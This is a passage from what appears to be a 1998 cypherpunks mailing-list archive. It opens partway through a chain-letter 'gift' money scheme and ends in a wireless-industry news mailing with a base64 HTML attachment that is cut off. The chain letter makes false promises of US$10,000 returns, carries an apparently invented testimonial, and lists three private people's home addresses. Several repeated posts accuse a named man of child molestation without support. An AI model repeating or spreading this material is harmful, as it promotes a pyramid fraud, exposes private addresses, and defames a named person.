 2. Go to "Edit" and "Copy"
 3. Start (compose) a new Email message
 4. Address your Recipients and Subject Blocks
 5. Click the Send Button
 
After you have pasted this article in your new Email, delete the old header
and footer (Subject, Date, To, From, Etc.).  Now you can edit the names and
addresses with ease.  I recommend deleting the top name, 
adding your name and address to the bottom of the list, then simply changing
the numbers.
 
THERE'S NOTHING MORE TO DO.  When your name reaches the first position in a
few days, it will be your turn to collect your gifts.  The gifts will be sent
to you by 1,500 to 2,000 people like yourself, who are 
willing to invest US$5.00 and one hour to receive US$10,000 in cash.  That's
all!  There will be a total of US$10,000 (or more) in US$5.00 bills in your
mailbox in two weeks.  US$10,000 for an hour's work!  I think it's WORTH IT,
don't you?
 
GO AHEAD...  TRY IT.  IT'S US$5.00!  EVEN IF YOU JUST MAKE 3 OR 4 THOUSAND,
WOULDN'T THAT BE NICE?  IF YOU TRY IT, IT WILL PAY!
 
                            --------TRUE STORY--------
 
    Cindy Allen writes: "I ran this gift summation four times last year.  The
first time I received over $7,000 in cash in less than two weeks and over
$10,000 in cash in the next three times I ran it.  I can't begin to 
tell you how great it feels not to have to worry about money anymore!  I thank
God for the day I received this letter!  It has truly changed my life!  Don t
be afraid to make gifts to strangers, they'll come back to 
you ten-fold.  So, let's keep it going and help each other in these "tough and
uncertain times."
 
Many of us just want to pay off our bills, buy a new car or buy a new home for
our family.  Whatever your reasons or needs are, this program worked for Cindy
and thousands of others (just like you and I) time and 
time again!  THIS PROGRAM CAN AND WILL WORK FOR YOU!
 
                            --------Can I Do It Again? --------
 
OF COURSE YOU CAN...This plan is structured for everyone to send only twenty
(20) letters each.  However, you are certainly not limited to twenty.  Mail
out as many as you can.  Every twenty letters you send has a return to you of
$10,000 or more.  If you can mail forty, sixty, eighty, or whatever, GO FOR
IT!  THE MORE YOU PUT INTO IT, THE MORE YOU GET OUT OF IT!
 
Each time you run this program, just follow the steps (1) through (3) and
everyone on your gift list benefits!  Simple enough?  You bet it is!  Besides,
there are no mailing lists to buy (and wait for), no further trips to the
printer or copiers, and you can do it again and again with your regular groups
of gifters, or start up a new group.  Some people produce a mailing list of
opportunity seekers and send out 200 or more.  Why not?  It beats working!
Each time you receive a MLM offer in the mail, respond with THIS letter! Your
name will climb to the number one position at dizzying geometric rates.
 
Follow the simple instructions and above all, please "PLAY FAIR."
 
That's the key to this program's success.  Your name must run the "full gamut"
on the list to produce the end results.  "Sneaking" your name higher up on the
list WILL NOT produce the results you think, and it 
only cheats the other people who have worked hard and earned the right to be
there.  So please, play by the rules and the $$, $$$ will come to you!
 
           --------Mail Your Letters Out Today--------
 
 $$$ TOGETHER, WE WILL PROSPER $$$

Mail your US$5.00 "Gift" to the first name on the list ONLY.  Remove the first
name and move the other two up one place and put your name in the #3 position.
 
 GOOD LUCK!
********************************************************************          
        
 

  1    J Penzak
       12 Boileau Ave
       Easton, PA 18042

  2    A Ladad
       121 W Mountain Rd Apt 6
       Allentown, PA 18103

  3    Chris K
       328 N Spaulding Ave Apt 2
       Los Angeles, CA 90036



*******************************************************************
 Wishing you the best in all you do!
 
 "I'm money conscious, but I also knew that I would just as easily spend $5.00
on junk food or something else that wouldn't amount to much.  You probably
don't believe this will work, but if you don't try it you will never know.
That's the way I felt. Try it.  You won't be sorry.  Best wishes in all your
ventures.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EmanueL <jdanny@pacbell.net>
Date: Mon, 24 Aug 1998 23:36:53 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808250636.XAA11432@mail-gw6.pacbell.net>
MIME-Version: 1.0
Content-Type: text/plain


Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/3.03C-PBWG  (Win95; U)
Remedy=Tell the world





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EmanueL <jdanny@pacbell.net>
Date: Mon, 24 Aug 1998 23:38:45 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808250638.XAA11973@mail-gw6.pacbell.net>
MIME-Version: 1.0
Content-Type: text/plain


Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/3.03C-PBWG  (Win95; U)
Remedy=Tell the world





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EmanueL <jdanny@pacbell.net>
Date: Mon, 24 Aug 1998 23:39:25 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808250639.XAA12112@mail-gw6.pacbell.net>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EmanueL <jdanny@pacbell.net>
Date: Mon, 24 Aug 1998 23:39:55 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808250639.XAA12224@mail-gw6.pacbell.net>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EmanueL <jdanny@pacbell.net>
Date: Mon, 24 Aug 1998 23:40:07 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808250640.XAA12279@mail-gw6.pacbell.net>
MIME-Version: 1.0
Content-Type: text/plain


Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/3.03C-PBWG  (Win95; U)
Remedy=Tell the world





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 24 Aug 1998 15:11:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808242211.AAA12796@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Would you kindly shut the fuck up already?  Thanks.


At 04:56 PM 8/24/98 -0400, Mario Freamat wrote:
>Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article
<6ijaq3$bb1@news1.panix.com>,
><The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
>#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
>#   molester who was fired from his consulting position at Salomon Brothers
>#   after he was caught masturbating in his cubicle at the child pornography
>#   JPEGs that he downloaded from the Internet.
>
>The poster's been awful quiet lately - did the feds arrest him?
>Browser=Netscape:Mozilla/4.05 [en] (X11; U; SunOS 5.4 sun4m)
>Remedy=Tell the world
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Tue, 25 Aug 1998 02:21:50 -0700 (PDT)
To: (STUFFED TUESDAY AUGUST 25 1998)
Subject: SPECIAL ISSUE - NOTHING BUT HI-RES PICS!
Message-ID: <19980825071001.28366.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


That's right, in response to your requests, today's issue
has ONE HUNDRED AND TWENTY *FREE* hi-res jpeg images you
are GOING to enjoy.

Check it out today!

       ---->   http://stuffed.net/98/8/25/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/8/25/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Lungu <lungu@netside.net>
Date: Tue, 25 Aug 1998 11:13:45 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808251813.LAA15871@grog.jpl.nasa.gov>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Lungu <lungu@netside.net>
Date: Tue, 25 Aug 1998 11:14:05 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808251813.LAA15874@grog.jpl.nasa.gov>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Lungu <lungu@netside.net>
Date: Tue, 25 Aug 1998 11:14:38 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808251814.LAA15877@grog.jpl.nasa.gov>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 25 Aug 1998 10:46:06 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 25, 1998
Message-ID: <199808251714.MAA06068@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713795.multipart/mixed"

--Boundary..3995.1071713795.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 




--Boundary..3995.1071713795.multipart/mixed
Content-Type: application/octet-stream; name="bin00019.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00019.bin"
Content-Description: "_CTIA_Daily_News_19980825a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxDRU5URVI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
bGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
aW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lmIiBBTFQ9IlRvZGF5J3Mg
TmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5ULiA5OCIgTk9TQVZFIEJP
UkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9BPjwvQ0VOVEVSPgo8L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDsKPFRBQkxFIEJPUkRFUj0wIFdJRFRI
PSI2MDAiID4KPFRSIEJHQ09MT1I9IiMwMDAwOTkiPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIENPTE9S
PSIjQ0NDQ0NDIj48Rk9OVCBTSVpFPSsxPkNUSUEKRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00gLSBBdWd1c3QgMjUsIDE5OTg8L0ZPTlQ+PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPk9tbmlwb2ludCBXaW5zIEFudGVubmEK
U2l0aW5nIFN1aXQgQWdhaW5zdCZuYnNwOzxCUj4KQW1oZXJzdCwgTmV3IEhh
bXBzaGlyZTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj5PbW5pcG9pbnQgQ29tbXVuaWNhdGlvbnMgaGFzIHdvbiBpdHMg
ZmVkZXJhbApsYXdzdWl0IGFnYWluc3QgdGhlIHRvd24sIGFsbG93aW5nIHRo
ZSBjb21wYW55IHRvIGJ1aWxkIGZvdXIgMTkwLWZvb3QgdG93ZXJzLgooPEEg
SFJFRj0iaHR0cDovL3d3dy5ib3N0b24uY29tL2RhaWx5bmV3cy93aXJlaHRt
bC8yMzcvT21uaXBvaW50X3dpbnNfdG93ZXJfc3VpdF9hZ2FpbnN0X0Euc2h0
bWwiPkJPU1RPTgpHTE9CRTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPk5leHRlbCBGaWxlcyBT
dWl0IGFnYWluc3QKV2hpdGUgT2FrLCBQZW5uc3lsdmFuaWE8L0ZPTlQ+PC9G
T05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+TmV4dGVsIENv
bW11bmljYXRpb25zIGhhcyBmaWxlZCBhIGxhd3N1aXQKaW4gVS5TLiBEaXN0
cmljdCBDb3VydCBhZ2FpbnN0IHRoZSBXaGl0ZSBPYWssIFBhLiwgYm9yb3Vn
aCBhbmQgaXRzIHpvbmluZwpoZWFyaW5nIGJvYXJkLiBOZXh0ZWwncyBhcHBs
aWNhdGlvbiBmb3IgYSAyMDAtZm9vdCB0b3dlciwgd2hpY2ggdGhlIGNvbXBh
bnkKd2FudHMgdG8gYnVpbGQgb24gMTAwIGFjcmVzIG9mIHVuZGV2ZWxvcGVk
IGxhbmQgb3duZWQgYnkgYSByZXNpZGVudCwgd2FzCnJlamVjdGVkIGJlY2F1
c2Ugb2YgYSBib3JvdWdoIG9yZGluYW5jZSB0aGF0IHByb2hpYml0cyB0b3dl
cnMgZnJvbSBiZWluZwpidWlsdCB3aXRoaW4gMiwwMDAgZmVldCBvZiBhbiBl
eGlzdGluZyBkd2VsbGluZy4gQSBOZXh0ZWwgbGVnYWwgY29uc3VsdGFudApj
bGFpbXMgdGhhdCB0aGUgb3JkaW5hbmNlIHZpb2xhdGVzIHRoZSAxOTk2IFRl
bGVjb21tdW5pY2F0aW9ucyBBY3QsIHdoaWNoCnByb2hpYml0cyBsb2NhbCBq
dXJpc2RpY3Rpb25zIGZyb20gcmVndWxhdGluZyB0ZWxlY29tbXVuaWNhdGlv
bnMgZmFjaWxpdGllcy4KKDxBIEhSRUY9Imh0dHA6Ly93d3cudHJpYmxpdmUu
Y29tL25ld3MvcHR3cjgyNC5odG1sIj5QSVRUU0JVUkdIIFRSSUJVTkUtUkVW
SUVXPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPjxGT05UIFNJWkU9KzE+TmV3IERldmljZSBMZXRzIFlvdSBTZW5kCmFu
ZCBSZWNlaXZlIEUtTWFpbCB3aGlsZSBvbiB0aGUgTW92ZTwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5NYWdlbGxhbiBD
b3Jwb3JhdGlvbiBhbm5vdW5jZWQgTW9uZGF5CmEgbmV3IGhhbmRoZWxkLCBz
YXRlbGxpdGUtYmFzZWQgZW1haWwgbWVzc2FnaW5nIGRldmljZSB0aGF0IHdp
bGwgYWxsb3cKdXNlcnMgdG8gc2VuZCBhbmQgcmVjZWl2ZSBlbWFpbCBmcm9t
IGFueXdoZXJlIGluIHRoZSB3b3JsZCBhbmQgcGlucG9pbnQKdGhlaXIgZXhh
Y3QgbG9jYXRpb24gb24gdGhlIGdsb2JlLiAoPEEgSFJFRj0iaHR0cDovL3d3
dy53aXJlZC5jb20vbmV3cy9uZXdzL3RlY2hub2xvZ3kvc3RvcnkvMTQ2MjQu
aHRtbCI+V0lSRUQ8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5CYXkgTmV0d29ya3MgUGl0Y2hl
cwpXaXJlbGVzcyBJbnRyYW5ldHM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+VGhlIGNvbXBhbnkgYmVsaWV2ZXMgdGhh
dCBpdCBjYW4gZmVlZAp3aXJlbGVzcyB0ZWNobm9sb2d5IGZvciBsb2NhbCBu
ZXR3b3JrcyBpbnRvIGl0cyBzYWxlcyBjaGFubmVscyBhbmQgcmVhcApyZXdh
cmRzIGluIGEgd2lkZS1vcGVuIGVtZXJnaW5nIG1hcmtldC4mbmJzcDsgKDxB
IEhSRUY9Imh0dHA6Ly93d3cubmV3cy5jb20vTmV3cy9JdGVtL1RleHRvbmx5
LzAsMjUsMjU2MzQsMDAuaHRtbD9wZnYiPk5FV1MuQ09NPC9BPik8L0ZPTlQ+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9
KzE+SWYgWW91ciBUZWVuIFB1dHMgUGVkYWwKdG8gTWV0YWwsIE5ldyBHYWRn
ZXRzIFdpbGwgVGF0dGxlPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPlR3byBuZXcgc3lzdGVtcyBvbiB0aGUgbWFya2V0
IHRyYWNrIGEKdmVoaWNsZSdzIGxvY2F0aW9uLCBzcGVlZCwgYW5kIGhvdyBt
dWNoIGl0IGhhcyBiZWVuIGRyaXZlbi4gUm9zd2VsbCwgR2EuLWJhc2VkClJv
YWR0cmFjJ3MgQ2VyZXMgUGVyc29uYWwgVHJhY2tpbmcgU3lzdGVtIGVtcGxv
eXMgc2F0ZWxsaXRlIG1hcHBpbmcgdGVjaG5vbG9neQphbmQgYSBjZWxsIHBo
b25lIHRvIG1vbml0b3IgYSBjYXIncyBsb2NhdGlvbi4gQ2VyZXMsIHJldGFp
bGluZyBhdCAkNjUwCmluIGFkZGl0aW9uIG9mIGEgJDEwMCBpbnN0YWxsYXRp
b24gZmVlLCBjb250YWN0cyB0aGUgcG9saWNlIGlmIGEgY2FyIGlzCmluIGFu
IGFjY2lkZW50IG9yIGlzIHN0b2xlbjsgcHJvdmlkZXMgbG9zdCBkcml2ZXJz
IHdpdGggZGlyZWN0aW9uczsgYW5kCndpdGggYW4gb3B0aW9uYWwgJDc1IENE
LVJPTSwgbGV0cyB1c2VycyB0cmFjayB0aGVpciBjYXIgdmlhIFBDLiBNaWxm
b3JkLApQYS4tYmFzZWQgRWFzZSBTaW11bGF0aW9uIG1hcmtldHMgdGhlIGRl
dmljZSwgQXV0b1dhdGNoLiBSZXRhaWxpbmcgZm9yCiQyOTUsIHRoZSBzeXN0
ZW0gZW1wbG95cyBhIGNhcidzIGRpYWdub3N0aWMgc3lzdGVtIHRvIHJlZ2lz
dGVyIGVuZ2luZSBmdW5jdGlvbnMuJm5ic3A7Cig8QSBIUkVGPSJodHRwOi8v
c2VhcmNoLnVzYXRvZGF5LmNvbS9wbHdlYi1jZ2kvZmFzdHdlYj9nZXRkb2Mr
ZGVmYXVsdCtsaWZlKzg1MjY0KzErd0FBQStJZiUyNllvdXIlMjZUZWVuJTI2
UHV0cyUyNlBlZGFsJTI2dG8lMjZNZXRhbCxOZXclMjZHYWRnZXRzJTI2V2ls
bCUyNlRhdHRsZSI+VVNBClRPREFZPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+THVjZW50IFVu
dmVpbHMgU3BlZWNoLVJlY29nbml0aW9uClRvb2xraXQ8L0ZPTlQ+PC9GT05U
PjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VGhlIFdpbmRvd3Mg
ZGV2ZWxvcGVyJ3Mga2l0IGFsbG93cyBwcm9ncmFtbWVycwp0byBjcmVhdGUg
YXBwbGljYXRpb25zIHRoYXQgaW5jbHVkZSBzcGVha2VyLWluZGVwZW5kZW50
IHNwZWVjaCByZWNvZ25pdGlvbgppbnRlcmZhY2VzLCBzdXBwb3J0IHBob25l
dGljIG9yIHdob2xlLXdvcmQgaW50ZXJwcmV0YXRpb24sIGFuZCBzdXBwb3J0
CnJ1bi10aW1lIHZvY2FidWxhcnkgY2hhbmdlcy4gKDxBIEhSRUY9Imh0dHA6
Ly93d3cuaW5mb3dvcmxkLmNvbS9jZ2ktYmluL2Rpc3BsYXlTdG9yeS5wbD85
ODA4MjQud2Nsc2FwLmh0bSI+SU5GTwpXT1JMRCBFTEVDVFJJQzwvQT4pIC0g
KDxBIEhSRUY9Imh0dHA6Ly93d3cubmV3cy5jb20vTmV3cy9JdGVtLzAsNCwy
NTYwMSwwMC5odG1sP293diI+TkVXUy5DT008L0E+KQotICg8QSBIUkVGPSJo
dHRwOi8vZGFpbHluZXdzLnlhaG9vLmNvbS9oZWFkbGluZXMvdGMvc3Rvcnku
aHRtbD9zPXYvbm0vMTk5ODA4MjQvdGMvbHVjZW50XzIuaHRtbCI+WUFIT088
L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
PEZPTlQgU0laRT0rMT5Tb255IFNheXMgTm8gQ2hhbmdlIGluClRpZXMgd2l0
aCBTaWVtZW5zPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPlNvbnkgQ29ycCBzYWlkIG9uIFR1ZXNkYXkgaXQgaGFkIG5v
IHBsYW5zCnRvIHNldmVyIGl0cyBjb29wZXJhdGl2ZSByZWxhdGlvbnNoaXAg
d2l0aCBTaWVtZW5zIEFHIGluIGRlc2lnbmluZyBtb2JpbGUKcGhvbmVzLCBk
ZXNwaXRlIHRoZSBsYXVuY2ggb2YgU29ueSdzIG5ldyBkZXZlbG9wbWVudCBj
ZW50ZXIgbmVhciBNdW5pY2gKZWFybGllciB0aGlzIHllYXIuICg8QSBIUkVG
PSJodHRwOi8vYml6LnlhaG9vLmNvbS9maW5hbmNlLzk4MDgyNC9zb255X3Nh
eXNfXzEuaHRtbCI+WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5USSBWZW50dXJlcyBJ
bnZlc3RzIGluClNuYXBUcmFjaydzIFdpcmVsZXNzIExvY2F0aW9uIFRlY2hu
b2xvZ3k8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+U25hcFRyYWNrJ3MgcGF0ZW50ZWQsIGhhbmRzZXQtYmFzZWQgd2ly
ZWxlc3MKbG9jYXRpb24gZGV0ZXJtaW5hdGlvbiB0ZWNobm9sb2d5IGhhcyBh
dHRyYWN0ZWQgYW4gaW52ZXN0bWVudCBmcm9tIFRJIFZlbnR1cmVzCkwuUC4s
IHRoZSAkMTAwIG1pbGxpb24gdmVudHVyZSBjYXBpdGFsIGZ1bmQgZXN0YWJs
aXNoZWQgYnkgVGV4YXMgSW5zdHJ1bWVudHMKYW5kIEhhbWJyZWNodCAmYW1w
OyBRdWlzdCB0byBhY2NlbGVyYXRlIG1hcmtldCBkZXZlbG9wbWVudCBlZmZv
cnRzIGxpbmtlZAp0byBkaWdpdGFsIHNpZ25hbCBwcm9jZXNzaW5nIChEU1Ap
LiAoPEEgSFJFRj0iaHR0cDovL2Jpei55YWhvby5jb20vYncvOTgwODI1L3Nu
YXB0cmFja18xLmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+QmVsbCBBdGxh
bnRpYyBNb2JpbGWScwpEaWNrIEx5bmNoIHRvIEtleW5vdGUmbmJzcDs8QlI+
CmF0IFdJUkVMRVNTIEkuVC4gQ29udmVudGlvbjwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5XaXRoIGEgc3Ryb25nIGZv
Y3VzIG9uIHRoZSBjb252ZXJnaW5nCndvcmxkIG9mIHdpcmVsZXNzIGFuZCBj
